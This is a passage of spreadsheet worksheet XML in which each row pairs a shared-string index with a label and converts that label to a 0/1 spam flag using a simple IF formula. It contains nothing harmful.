    <row r="281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A281" t="s">
        <v>5571</v>
      </c>
      <c r="B281" t="s">
        <v>5294</v>
      </c>
      <c r="C281" s="1">
        <f>IF(B281="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A282" t="s">
        <v>5572</v>
      </c>
      <c r="B282" t="s">
        <v>5294</v>
      </c>
      <c r="C282" s="1">
        <f>IF(B282="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A283" t="s">
        <v>5573</v>
      </c>
      <c r="B283" t="s">
        <v>5294</v>
      </c>
      <c r="C283" s="1">
        <f>IF(B283="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A284" t="s">
        <v>5574</v>
      </c>
      <c r="B284" t="s">
        <v>5294</v>
      </c>
      <c r="C284" s="1">
        <f>IF(B284="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A285" t="s">
        <v>5575</v>
      </c>
      <c r="B285" t="s">
        <v>5294</v>
      </c>
      <c r="C285" s="1">
        <f>IF(B285="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A286" t="s">
        <v>5576</v>
      </c>
      <c r="B286" t="s">
        <v>5294</v>
      </c>
      <c r="C286" s="1">
        <f>IF(B286="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A287" t="s">
        <v>5577</v>
      </c>
      <c r="B287" t="s">
        <v>5294</v>
      </c>
      <c r="C287" s="1">
        <f>IF(B287="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A288" t="s">
        <v>5578</v>
      </c>
      <c r="B288" t="s">
        <v>5294</v>
      </c>
      <c r="C288" s="1">
        <f>IF(B288="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A289" t="s">
        <v>5579</v>
      </c>
      <c r="B289" t="s">
        <v>5294</v>
      </c>
      <c r="C289" s="1">
        <f>IF(B289="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A290" t="s">
        <v>5580</v>
      </c>
      <c r="B290" t="s">
        <v>5294</v>
      </c>
      <c r="C290" s="1">
        <f>IF(B290="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A291" t="s">
        <v>5581</v>
      </c>
      <c r="B291" t="s">
        <v>5294</v>
      </c>
      <c r="C291" s="1">
        <f>IF(B291="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A292" t="s">
        <v>5582</v>
      </c>
      <c r="B292" t="s">
        <v>5294</v>
      </c>
      <c r="C292" s="1">
        <f>IF(B292="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A293" t="s">
        <v>5583</v>
      </c>
      <c r="B293" t="s">
        <v>5294</v>
      </c>
      <c r="C293" s="1">
        <f>IF(B293="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A294" t="s">
        <v>5584</v>
      </c>
      <c r="B294" t="s">
        <v>5294</v>
      </c>
      <c r="C294" s="1">
        <f>IF(B294="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A295" t="s">
        <v>5585</v>
      </c>
      <c r="B295" t="s">
        <v>5294</v>
      </c>
      <c r="C295" s="1">
        <f>IF(B295="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A296" t="s">
        <v>5586</v>
      </c>
      <c r="B296" t="s">
        <v>5294</v>
      </c>
      <c r="C296" s="1">
        <f>IF(B296="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A297" t="s">
        <v>5587</v>
      </c>
      <c r="B297" t="s">
        <v>5297</v>
      </c>
      <c r="C297" s="1">
        <f>IF(B297="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A298" t="s">
        <v>5588</v>
      </c>
      <c r="B298" t="s">
        <v>5294</v>
      </c>
      <c r="C298" s="1">
        <f>IF(B298="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A299" t="s">
        <v>5589</v>
      </c>
      <c r="B299" t="s">
        <v>5294</v>
      </c>
      <c r="C299" s="1">
        <f>IF(B299="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A300" t="s">
        <v>5590</v>
      </c>
      <c r="B300" t="s">
        <v>5294</v>
      </c>
      <c r="C300" s="1">
        <f>IF(B300="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A301" t="s">
        <v>5591</v>
      </c>
      <c r="B301" t="s">
        <v>5294</v>
      </c>
      <c r="C301" s="1">
        <f>IF(B301="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A302" t="s">
        <v>5592</v>
      </c>
      <c r="B302" t="s">
        <v>5294</v>
      </c>
      <c r="C302" s="1">
        <f>IF(B302="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A303" t="s">
        <v>5593</v>
      </c>
      <c r="B303" t="s">
        <v>5294</v>
      </c>
      <c r="C303" s="1">
        <f>IF(B303="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A304" t="s">
        <v>5594</v>
      </c>
      <c r="B304" t="s">
        <v>5294</v>
      </c>
      <c r="C304" s="1">
        <f>IF(B304="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A305" t="s">
        <v>5595</v>
      </c>
      <c r="B305" t="s">
        <v>5294</v>
      </c>
      <c r="C305" s="1">
        <f>IF(B305="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A306" t="s">
        <v>5596</v>
      </c>
      <c r="B306" t="s">
        <v>5297</v>
      </c>
      <c r="C306" s="1">
        <f>IF(B306="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A307" t="s">
        <v>5597</v>
      </c>
      <c r="B307" t="s">
        <v>5294</v>
      </c>
      <c r="C307" s="1">
        <f>IF(B307="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A308" t="s">
        <v>5598</v>
      </c>
      <c r="B308" t="s">
        <v>5294</v>
      </c>
      <c r="C308" s="1">
        <f>IF(B308="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A309" t="s">
        <v>5599</v>
      </c>
      <c r="B309" t="s">
        <v>5294</v>
      </c>
      <c r="C309" s="1">
        <f>IF(B309="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A310" t="s">
        <v>5600</v>
      </c>
      <c r="B310" t="s">
        <v>5297</v>
      </c>
      <c r="C310" s="1">
        <f>IF(B310="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A311" t="s">
        <v>5601</v>
      </c>
      <c r="B311" t="s">
        <v>5294</v>
      </c>
      <c r="C311" s="1">
        <f>IF(B311="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A312" t="s">
        <v>5602</v>
      </c>
      <c r="B312" t="s">
        <v>5294</v>
      </c>
      <c r="C312" s="1">
        <f>IF(B312="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A313" t="s">
        <v>5603</v>
      </c>
      <c r="B313" t="s">
        <v>5297</v>
      </c>
      <c r="C313" s="1">
        <f>IF(B313="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A314" t="s">
        <v>5604</v>
      </c>
      <c r="B314" t="s">
        <v>5294</v>
      </c>
      <c r="C314" s="1">
        <f>IF(B314="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A315" t="s">
        <v>5605</v>
      </c>
      <c r="B315" t="s">
        <v>5294</v>
      </c>
      <c r="C315" s="1">
        <f>IF(B315="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A316" t="s">
        <v>5606</v>
      </c>
      <c r="B316" t="s">
        <v>5294</v>
      </c>
      <c r="C316" s="1">
        <f>IF(B316="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A317" t="s">
        <v>5607</v>
      </c>
      <c r="B317" t="s">
        <v>5294</v>
      </c>
      <c r="C317" s="1">
        <f>IF(B317="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A318" t="s">
        <v>5608</v>
      </c>
      <c r="B318" t="s">
        <v>5294</v>
      </c>
      <c r="C318" s="1">
        <f>IF(B318="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A319" t="s">
        <v>5609</v>
      </c>
      <c r="B319" t="s">
        <v>5294</v>
      </c>
      <c r="C319" s="1">
        <f>IF(B319="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A320" t="s">
        <v>5610</v>
      </c>
      <c r="B320" t="s">
        <v>5297</v>
      </c>
      <c r="C320" s="1">
        <f>IF(B320="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A321" t="s">
        <v>5611</v>
      </c>
      <c r="B321" t="s">
        <v>5294</v>
      </c>
      <c r="C321" s="1">
        <f>IF(B321="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A322" t="s">
        <v>5612</v>
      </c>
      <c r="B322" t="s">
        <v>5294</v>
      </c>
      <c r="C322" s="1">
        <f>IF(B322="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A323" t="s">
        <v>5613</v>
      </c>
      <c r="B323" t="s">
        <v>5294</v>
      </c>
      <c r="C323" s="1">
        <f>IF(B323="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A324" t="s">
        <v>5614</v>
      </c>
      <c r="B324" t="s">
        <v>5294</v>
      </c>
      <c r="C324" s="1">
        <f>IF(B324="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A325" t="s">
        <v>5615</v>
      </c>
      <c r="B325" t="s">
        <v>5294</v>
      </c>
      <c r="C325" s="1">
        <f>IF(B325="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A326" t="s">
        <v>5616</v>
      </c>
      <c r="B326" t="s">
        <v>5294</v>
      </c>
      <c r="C326" s="1">
        <f>IF(B326="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A327" t="s">
        <v>5341</v>
      </c>
      <c r="B327" t="s">
        <v>5294</v>
      </c>
      <c r="C327" s="1">
        <f>IF(B327="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A328" t="s">
        <v>5617</v>
      </c>
      <c r="B328" t="s">
        <v>5294</v>
      </c>
      <c r="C328" s="1">
        <f>IF(B328="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A329" t="s">
        <v>5618</v>
      </c>
      <c r="B329" t="s">
        <v>5294</v>
      </c>
      <c r="C329" s="1">
        <f>IF(B329="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A330" t="s">
        <v>5619</v>
      </c>
      <c r="B330" t="s">
        <v>5294</v>
      </c>
      <c r="C330" s="1">
        <f>IF(B330="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A331" t="s">
        <v>5620</v>
      </c>
      <c r="B331" t="s">
        <v>5294</v>
      </c>
      <c r="C331" s="1">
        <f>IF(B331="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A332" t="s">
        <v>5621</v>
      </c>
      <c r="B332" t="s">
        <v>5294</v>
      </c>
      <c r="C332" s="1">
        <f>IF(B332="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A333" t="s">
        <v>5622</v>
      </c>
      <c r="B333" t="s">
        <v>5294</v>
      </c>
      <c r="C333" s="1">
        <f>IF(B333="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A334" t="s">
        <v>5623</v>
      </c>
      <c r="B334" t="s">
        <v>5297</v>
      </c>
      <c r="C334" s="1">
        <f>IF(B334="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A335" t="s">
        <v>5624</v>
      </c>
      <c r="B335" t="s">
        <v>5294</v>
      </c>
      <c r="C335" s="1">
        <f>IF(B335="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A336" t="s">
        <v>5625</v>
      </c>
      <c r="B336" t="s">
        <v>5297</v>
      </c>
      <c r="C336" s="1">
        <f>IF(B336="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A337" t="s">
        <v>5626</v>
      </c>
      <c r="B337" t="s">
        <v>5294</v>
      </c>
      <c r="C337" s="1">
        <f>IF(B337="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A338" t="s">
        <v>5627</v>
      </c>
      <c r="B338" t="s">
        <v>5294</v>
      </c>
      <c r="C338" s="1">
        <f>IF(B338="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A339" t="s">
        <v>5628</v>
      </c>
      <c r="B339" t="s">
        <v>5294</v>
      </c>
      <c r="C339" s="1">
        <f>IF(B339="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A340" t="s">
        <v>5376</v>
      </c>
      <c r="B340" t="s">
        <v>5294</v>
      </c>
      <c r="C340" s="1">
        <f>IF(B340="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A341" t="s">
        <v>5629</v>
      </c>
      <c r="B341" t="s">
        <v>5294</v>
      </c>
      <c r="C341" s="1">
        <f>IF(B341="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A342" t="s">
        <v>5630</v>
      </c>
      <c r="B342" t="s">
        <v>5294</v>
      </c>
      <c r="C342" s="1">
        <f>IF(B342="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A343" t="s">
        <v>5631</v>
      </c>
      <c r="B343" t="s">
        <v>5294</v>
      </c>
      <c r="C343" s="1">
        <f>IF(B343="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A344" t="s">
        <v>5632</v>
      </c>
      <c r="B344" t="s">
        <v>5294</v>
      </c>
      <c r="C344" s="1">
        <f>IF(B344="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A345" t="s">
        <v>5633</v>
      </c>
      <c r="B345" t="s">
        <v>5294</v>
      </c>
      <c r="C345" s="1">
        <f>IF(B345="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A346" t="s">
        <v>5634</v>
      </c>
      <c r="B346" t="s">
        <v>5294</v>
      </c>
      <c r="C346" s="1">
        <f>IF(B346="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A347" t="s">
        <v>5635</v>
      </c>
      <c r="B347" t="s">
        <v>5294</v>
      </c>
      <c r="C347" s="1">
        <f>IF(B347="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A348" t="s">
        <v>5636</v>
      </c>
      <c r="B348" t="s">
        <v>5294</v>
      </c>
      <c r="C348" s="1">
        <f>IF(B348="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A349" t="s">
        <v>5637</v>
      </c>
      <c r="B349" t="s">
        <v>5294</v>
      </c>
      <c r="C349" s="1">
        <f>IF(B349="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A350" t="s">
        <v>5638</v>
      </c>
      <c r="B350" t="s">
        <v>5297</v>
      </c>
      <c r="C350" s="1">
        <f>IF(B350="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A351" t="s">
        <v>5639</v>
      </c>
      <c r="B351" t="s">
        <v>5294</v>
      </c>
      <c r="C351" s="1">
        <f>IF(B351="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A352" t="s">
        <v>5640</v>
      </c>
      <c r="B352" t="s">
        <v>5294</v>
      </c>
      <c r="C352" s="1">
        <f>IF(B352="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A353" t="s">
        <v>5641</v>
      </c>
      <c r="B353" t="s">
        <v>5294</v>
      </c>
      <c r="C353" s="1">
        <f>IF(B353="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A354" t="s">
        <v>5642</v>
      </c>
      <c r="B354" t="s">
        <v>5294</v>
      </c>
      <c r="C354" s="1">
        <f>IF(B354="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A355" t="s">
        <v>5643</v>
      </c>
      <c r="B355" t="s">
        <v>5294</v>
      </c>
      <c r="C355" s="1">
        <f>IF(B355="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A356" t="s">
        <v>5644</v>
      </c>
      <c r="B356" t="s">
        <v>5294</v>
      </c>
      <c r="C356" s="1">
        <f>IF(B356="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A357" t="s">
        <v>5645</v>
      </c>
      <c r="B357" t="s">
        <v>5294</v>
      </c>
      <c r="C357" s="1">
        <f>IF(B357="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A358" t="s">
        <v>5541</v>
      </c>
      <c r="B358" t="s">
        <v>5297</v>
      </c>
      <c r="C358" s="1">
        <f>IF(B358="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A359" t="s">
        <v>5646</v>
      </c>
      <c r="B359" t="s">
        <v>5297</v>
      </c>
      <c r="C359" s="1">
        <f>IF(B359="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A360" t="s">
        <v>5647</v>
      </c>
      <c r="B360" t="s">
        <v>5294</v>
      </c>
      <c r="C360" s="1">
        <f>IF(B360="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A361" t="s">
        <v>5648</v>
      </c>
      <c r="B361" t="s">
        <v>5294</v>
      </c>
      <c r="C361" s="1">
        <f>IF(B361="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A362" t="s">
        <v>5649</v>
      </c>
      <c r="B362" t="s">
        <v>5294</v>
      </c>
      <c r="C362" s="1">
        <f>IF(B362="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A363" t="s">
        <v>5650</v>
      </c>
      <c r="B363" t="s">
        <v>5294</v>
      </c>
      <c r="C363" s="1">
        <f>IF(B363="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A364" t="s">
        <v>5651</v>
      </c>
      <c r="B364" t="s">
        <v>5294</v>
      </c>
      <c r="C364" s="1">
        <f>IF(B364="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A365" t="s">
        <v>5652</v>
      </c>
      <c r="B365" t="s">
        <v>5294</v>
      </c>
      <c r="C365" s="1">
        <f>IF(B365="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A366" t="s">
        <v>5653</v>
      </c>
      <c r="B366" t="s">
        <v>5294</v>
      </c>
      <c r="C366" s="1">
        <f>IF(B366="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A367" t="s">
        <v>5654</v>
      </c>
      <c r="B367" t="s">
        <v>5294</v>
      </c>
      <c r="C367" s="1">
        <f>IF(B367="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A368" t="s">
        <v>5655</v>
      </c>
      <c r="B368" t="s">
        <v>5297</v>
      </c>
      <c r="C368" s="1">
        <f>IF(B368="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A369" t="s">
        <v>5656</v>
      </c>
      <c r="B369" t="s">
        <v>5297</v>
      </c>
      <c r="C369" s="1">
        <f>IF(B369="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A370" t="s">
        <v>5657</v>
      </c>
      <c r="B370" t="s">
        <v>5294</v>
      </c>
      <c r="C370" s="1">
        <f>IF(B370="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A371" t="s">
        <v>5658</v>
      </c>
      <c r="B371" t="s">
        <v>5294</v>
      </c>
      <c r="C371" s="1">
        <f>IF(B371="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A372" t="s">
        <v>5659</v>
      </c>
      <c r="B372" t="s">
        <v>5294</v>
      </c>
      <c r="C372" s="1">
        <f>IF(B372="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A373" t="s">
        <v>5660</v>
      </c>
      <c r="B373" t="s">
        <v>5294</v>
      </c>
      <c r="C373" s="1">
        <f>IF(B373="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A374" t="s">
        <v>5661</v>
      </c>
      <c r="B374" t="s">
        <v>5294</v>
      </c>
      <c r="C374" s="1">
        <f>IF(B374="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A375" t="s">
        <v>5662</v>
      </c>
      <c r="B375" t="s">
        <v>5294</v>
      </c>
      <c r="C375" s="1">
        <f>IF(B375="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A376" t="s">
        <v>5663</v>
      </c>
      <c r="B376" t="s">
        <v>5297</v>
      </c>
      <c r="C376" s="1">
        <f>IF(B376="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A377" t="s">
        <v>5664</v>
      </c>
      <c r="B377" t="s">
        <v>5294</v>
      </c>
      <c r="C377" s="1">
        <f>IF(B377="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A378" t="s">
        <v>5665</v>
      </c>
      <c r="B378" t="s">
        <v>5294</v>
      </c>
      <c r="C378" s="1">
        <f>IF(B378="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A379" t="s">
        <v>5666</v>
      </c>
      <c r="B379" t="s">
        <v>5294</v>
      </c>
      <c r="C379" s="1">
        <f>IF(B379="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A380" t="s">
        <v>5667</v>
      </c>
      <c r="B380" t="s">
        <v>5294</v>
      </c>
      <c r="C380" s="1">
        <f>IF(B380="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A381" t="s">
        <v>5668</v>
      </c>
      <c r="B381" t="s">
        <v>5294</v>
      </c>
      <c r="C381" s="1">
        <f>IF(B381="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A382" t="s">
        <v>5669</v>
      </c>
      <c r="B382" t="s">
        <v>5294</v>
      </c>
      <c r="C382" s="1">
        <f>IF(B382="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A383" t="s">
        <v>5670</v>
      </c>
      <c r="B383" t="s">
        <v>5294</v>
      </c>
      <c r="C383" s="1">
        <f>IF(B383="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A384" t="s">
        <v>5671</v>
      </c>
      <c r="B384" t="s">
        <v>5294</v>
      </c>
      <c r="C384" s="1">
        <f>IF(B384="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A385" t="s">
        <v>5672</v>
      </c>
      <c r="B385" t="s">
        <v>5294</v>
      </c>
      <c r="C385" s="1">
        <f>IF(B385="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A386" t="s">
        <v>5673</v>
      </c>
      <c r="B386" t="s">
        <v>5297</v>
      </c>
      <c r="C386" s="1">
        <f>IF(B386="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A387" t="s">
        <v>5674</v>
      </c>
      <c r="B387" t="s">
        <v>5294</v>
      </c>
      <c r="C387" s="1">
        <f>IF(B387="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A388" t="s">
        <v>5675</v>
      </c>
      <c r="B388" t="s">
        <v>5294</v>
      </c>
      <c r="C388" s="1">
        <f>IF(B388="spam",1,0)</f>
